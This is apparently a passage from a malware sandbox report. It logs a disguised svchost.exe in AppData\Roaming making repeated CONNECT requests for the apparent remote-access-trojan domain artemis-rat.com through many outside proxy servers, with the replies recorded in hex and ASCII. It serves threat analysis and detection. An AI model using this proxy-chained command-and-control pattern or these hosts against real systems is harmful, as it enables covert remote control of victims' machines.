Mar 9, 2024 13:14:30.525509119 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 ce 2b f8 32 00 57 32 3e 38 6c a8 78 d4 07 a8 b5 29 26 4a 31 9f 90 db d8 7f a5 56 bc 88 87 da 3c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 09 f0 96 d1 a6 3c 37 1f 90 89 c1 82 fa e2 4d cc 91 55 76 fc cc Data Ascii: %! +2W2>8lx)&J1V<(<7MUv-^l{:b
Mar 9, 2024 13:14:30.696814060 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 ce 5a 62 19 6c b8 cf 15 2b 1d ae 39 1c 2a f7 4d b9 cb be b4 40 33 45 53 09 6b 54 f4 46 54 1d 66 a4 f9 27 07 4d fa 57 0e Data Ascii: (Zbl+9*M@3ESkTFTf'MW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2401	192.168.2.5	56898	181.129.62.2	47377	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.102824926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2402	192.168.2.5	57871	162.214.121.173	44826	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.106024027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.623852968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.270908117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.546401978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.880494118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.254093885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2403	192.168.2.5	57672	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.106997013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.464099884 CET	184	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 494 Connection: close ETag: "658e91eb-1ee"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2404	192.168.2.5	55528	174.77.111.196	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.108241081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2405	192.168.2.5	57709	148.72.215.79	47202	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.111960888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880198956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880990982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974312067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974242926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2406	192.168.2.5	57759	3.37.125.76	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.121753931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.444415092 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2407	192.168.2.5	57727	31.28.4.192	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.124950886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.467092991 CET	488	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:30 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 63 2e 70 6c 6f 6d 62 77 61 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 1c.plombway.ru Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2408	192.168.2.5	57688	49.228.131.169	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.126274109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2409	192.168.2.5	57725	95.0.168.62	1981	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.141503096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880237103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.068100929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.177702904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.504307985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2410	192.168.2.5	57629	5.32.88.130	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.141504049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.568950891 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2411	192.168.2.5	56732	51.89.173.40	31724	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.143019915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2412	192.168.2.5	57719	47.100.236.23	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.144161940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.512271881 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2413	192.168.2.5	57862	44.190.9.65	48100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.145330906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2414	192.168.2.5	57746	58.20.248.139	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.149332047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.880247116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.207376003 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2415	192.168.2.5	57331	117.160.250.138	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.149432898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.442502975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.125802994 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2416	192.168.2.5	57615	119.39.68.105	2323	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.154479027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2417	192.168.2.5	57753	185.220.226.235	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.157821894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2418	192.168.2.5	57768	43.155.130.182	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.180309057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2419	192.168.2.5	57889	172.214.74.105	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.196388006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.742350101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.568056107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.965050936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802248955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677685022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2420	192.168.2.5	57799	43.133.70.57	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.196852922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2421	192.168.2.5	57808	3.10.93.50	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.198693991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.492794991 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2422	192.168.2.5	57778	111.90.150.109	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.201683044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2423	192.168.2.5	57907	104.18.103.125	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.209834099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.364032984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2424	192.168.2.5	56858	78.170.135.164	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.210540056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
